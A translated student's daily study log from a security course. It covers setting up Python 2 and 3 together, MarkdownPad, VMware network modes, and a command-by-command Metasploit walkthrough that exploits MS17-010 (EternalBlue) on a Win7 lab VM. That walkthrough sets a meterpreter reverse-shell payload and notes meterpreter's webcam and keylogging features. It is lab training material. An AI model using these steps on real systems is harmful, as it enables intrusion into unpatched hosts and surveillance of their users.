Daily Record 2020/01/06 (Keywords: environment setup, exploits)

Daily Record

Wang yuan can

January 6, 2020

@ Rain Man Network Security

1. Knowledge summary

1. Making Python 2 and Python 3 coexist

  (1) Download: from the official Python website, download the 2.7.17 and 3.7 versions, choosing the "Windows x86-64 MSI installer" file.

  (2) Installation: install Python 2 first, then Python 3. During each installation create a new folder, such as "Python27" to hold Python 2, and keep the default of letting the installer configure the environment variables automatically.

  (3) Environment variable configuration: select the Path variable among the system environment variables and add two new paths each for Python 2 and Python 3. Taking Python 2 as the example, path 1 is C:\Python27 (the Python 2 installation path) and path 2 is C:\Python27\Scripts (the path of the Scripts folder); Python 3 is configured in the same way.

  (4) Delete pip.exe: delete pip.exe under C:\Python27\Scripts, keeping pip2.exe.

  (5) Rename: rename the python.exe under C:\Python27 and under C:\Python37 to python2 and python3 respectively, so the two can be told apart.

  (6) Test: type python in cmd; the Python 3 version starts by default. To switch to the Python 2 version, enter the command python2 directly.
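As an added check that is not part of the original post, the following PowerShell script verifies each step of the setup above on the Windows host. It assumes the installation folders are C:\Python27 and C:\Python37 as in steps (2) and (5).

```powershell
# Added example (not from the original post): verify the Python 2/3 coexistence setup.
# Assumed installation folders, matching steps (2) and (5) above.
$py2Root = 'C:\Python27'
$py3Root = 'C:\Python37'

# Step (3): both installation roots and their Scripts folders should appear in PATH.
$pathEntries = $env:Path -split ';' | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') }
foreach ($dir in @($py2Root, "$py2Root\Scripts", $py3Root, "$py3Root\Scripts")) {
    "{0,-22} on PATH: {1}" -f $dir, ($pathEntries -contains $dir)
}

# Step (4): pip.exe removed from the Python 2 Scripts folder and pip2.exe kept, so that
# 'pip' can only resolve to the Python 3 copy regardless of PATH order.
"pip.exe  in $py2Root\Scripts (expect False): {0}" -f (Test-Path "$py2Root\Scripts\pip.exe")
"pip2.exe in $py2Root\Scripts (expect True):  {0}" -f (Test-Path "$py2Root\Scripts\pip2.exe")

# Steps (5)/(6): 'python' should start 3.x and 'python2' should start 2.7. Show which file
# each launcher resolves to. Python 2.7 writes --version to stderr, hence the 2>&1.
foreach ($launcher in 'python', 'python2', 'python3', 'pip', 'pip2') {
    $cmd = Get-Command $launcher -ErrorAction SilentlyContinue
    if ($null -eq $cmd) { "{0,-8} not found" -f $launcher; continue }
    $version = (& $cmd.Source --version 2>&1 | ForEach-Object { "$_" }) -join ' '
    "{0,-8} -> {1,-30} {2}" -f $launcher, $cmd.Source, $version.Trim()
}
```

Run it from a freshly opened PowerShell window, since PATH changes made in the system settings are not picked up by windows that were already open.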

2. Download MarkdownPad

  (1) Download: download the application from the MarkdownPad official website, http://markdownpad.com/

  (2) Install Awesomium: if an error message appears after installation and Markdown cannot be used, Awesomium needs to be installed; it can be downloaded from my netdisk: https://pan.baidu.com/s/1qY7LKba

3. MS17-010 exploitation

step1: Record the IP addresses of the attacker and victim hosts
  In the Kali terminal run the command "ifconfig" and find inet, which is the IP address of the Kali attacker host.
  In the target machine's cmd run the command "ipconfig" and find the IPv4 address of the local connection.
  lhost: 192.168.110.135
  rhost: 192.168.110.137
step2: Check whether the victim host is alive; you can use the ping command, together with nmap
  ping 192.168.110.137
step3: Start the Metasploit framework
  msfconsole
step4: Search for the "ms17-010" vulnerability
  search ms17-010
step5: Use the corresponding module
  use exploit/windows/smb/ms17_010_eternalblue
step6: Show the options (what needs to be configured is displayed under the module)
  show options
step7: Set the payload
  set payload windows/x64/meterpreter/reverse_tcp
step8: Set the IPs of the victim host and the attacker host
  set rhost 192.168.110.137
  set lhost 192.168.110.135
step9: Launch the attack
  exploit
  When a meterpreter prompt appears, the penetration has succeeded.
PS: 1. "WIN" is displayed when the attack succeeds; press Enter to enter the Win7 cmd.
  2. Meterpreter is the default shellcode for Windows systems under Metasploit; exploitation can be extended within meterpreter, for example enabling the camera, the keyboard and screen monitoring.
  3. If the terminal shows garbled characters, open "Terminal - Preferences - Unnamed - Compatibility - Encoding" and select "Chinese Simplified GBK".

4. The difference between the three VMware networking modes

1. Bridged mode (Bridge)

Principle: "bridge" refers to the host. This machine has two network cards, each in one of two local area networks, and the program running on the "bridge" lets packets from LAN A flow intact into LAN B, and vice versa. In bridged mode, the VMware network adapter and the physical network card should be in the same IP segment. When bridging is used, VMware bridges a virtual network card to the real physical card, so that all packets sent to the physical NIC are passed on to the VMware virtual machine, and packets sent by the VMware machine also go out through the physical NIC at the other end of the bridge. If the physical network card can get online, the bridged virtual card can get online too.

Networking: this is the simplest way to network. Within the LAN, the virtual machine is networked in whatever way the host is networked; the virtual machine can be regarded as just another computer on the LAN.


Figure 1. Schematic bridge mode

2. Address translation mode (NAT)

Principle: NAT (Network Address Translation). With VMware's NAT, a network card emulated by software is used between the host and the virtual machines; the IP of this card is in the same address segment as the virtual machines. At the same time there is a NAT between this virtual card and the host's network interface. Every packet sent by a virtual machine passes through the virtual card, then the NAT, and is then sent out through the host's interface. The virtual card and the virtual machines are in one address segment, while the virtual machines and the host are in different segments, so the virtual card acts as the virtual machines' gateway. The virtual machines can ping the host's IP, but the host cannot ping the virtual machines' IP.

Networking: 1. Dynamic IP address: set the virtual machine to use DHCP; under Windows choose "Obtain an IP address automatically", under Linux enable the DHCP service. (In VMware's "Edit → Virtual Network Settings", NAT and DHCP are enabled by default; in general NAT is on and DHCP is off by default.) 2. Static IP address: set the IP in the same network segment as vmnet1, set the gateway to VMnet8's gateway (which can be found in the NAT tab of "Virtual Network Settings"), usually xxx.xxx.xxx.2, set the subnet mask the same as VMnet8 (after the IP address is set, the subnet mask is generated automatically), and set the DNS the same as the host's. With NAT, when the host can access the Internet the virtual machine can access it too, but the host cannot access the virtual machine.


Figure 2. Schematic address translation mode

3. Host-only mode (Host-only)

Principle: provides network access between the host and the virtual machines only. Data is exchanged only between the virtual machine and the host, and the virtual machine is not allowed to access the Internet. In host-only mode, VMware creates a virtual network card in the real Windows system; this card can be seen among the network connections, usually as VMnet1, and its role is to let Windows see the IPs of the virtual machines.

Figure 3. Schematic host-only mode
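As an added example that is not part of the original post, this PowerShell script inspects the host-side VMware adapters for the NAT and host-only modes described above, prints the subnet each one serves, and derives the usual xxx.xxx.xxx.2 NAT gateway a static-IP guest needs. It assumes VMware Workstation's default Windows adapter names "VMware Network Adapter VMnet1" and "VMware Network Adapter VMnet8".

```powershell
# Added example (not from the original post): map the host's VMware adapters to the
# host-only (VMnet1) and NAT (VMnet8) modes and derive the NAT gateway for a static-IP guest.
# Assumes the default adapter names VMware Workstation uses on Windows.
$adapters = Get-NetAdapter | Where-Object { $_.Name -like 'VMware Network Adapter VMnet*' }
foreach ($adapter in $adapters) {
    # First IPv4 address on the adapter; the host side of the virtual network.
    $ip = Get-NetIPAddress -InterfaceIndex $adapter.ifIndex -AddressFamily IPv4 | Select-Object -First 1
    if ($null -eq $ip) { "{0,-32} no IPv4 address" -f $adapter.Name; continue }
    $octets = $ip.IPAddress -split '\.'
    $subnet = "{0}.{1}.{2}.0/{3}" -f $octets[0], $octets[1], $octets[2], $ip.PrefixLength
    $mode = if ($adapter.Name -like '*VMnet1') { 'host-only: host <-> VM only, no Internet' }
            elseif ($adapter.Name -like '*VMnet8') { 'NAT: VM reaches the Internet through the host' }
            else { 'custom virtual network' }
    "{0,-32} {1,-18} {2}" -f $adapter.Name, $subnet, $mode
    if ($adapter.Name -like '*VMnet8') {
        # Static-IP guest on NAT: an address in this subnet, gateway .2 as the post describes,
        # subnet mask the same as VMnet8, DNS the same as the host.
        $gateway = "{0}.{1}.{2}.2" -f $octets[0], $octets[1], $octets[2]
        "  static-IP guest on NAT: gateway $gateway, subnet mask /$($ip.PrefixLength)"
    }
}
```

Run it on the Windows host running VMware; Get-NetAdapter and Get-NetIPAddress are available on Windows 8 / Server 2012 and later.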

2. Personal summary

1. Summary: on the first day I mainly got to know some software and plugins that improve work and development efficiency. Downloading these many plugins is not an easy thing; as Teacher Bai said, installing software and setting up environments is maddening, but for someone about to enter the computer industry it is bound to be a process of "pain and joy" experienced countless times. We can see that the security industry is currently at a hot spot, and many people are pouring into this field for a generous salary. I believe that in a few more years network security talent will spring up like bamboo shoots after rain, and the corresponding bar to entry into the industry will rise as well. Teacher Bai showed us how an excellent person keeps a learning attitude all along and builds up their own knowledge base. This inspired me deeply: only by "always learning", improving oneself in one new period after another, can one gain and achieve something.

2. Other:

(1) Find the material you want in these places:

    • 吾爱破解网
    • github
    • MSDN (download the OS you need; the OS images here are clean and basically carry no viruses)

  (2) A role model for learning

    Building a knowledge base: https://github.com/404notf0und/Always-Learning

3. References

  1. The three VMware networking modes: 1. https://www.cnblogs.com/xuyatao/p/9778975.html

              2. https://blog.csdn.net/taotongning/article/details/81477472

Origin www.cnblogs.com/ribver/p/12178744.html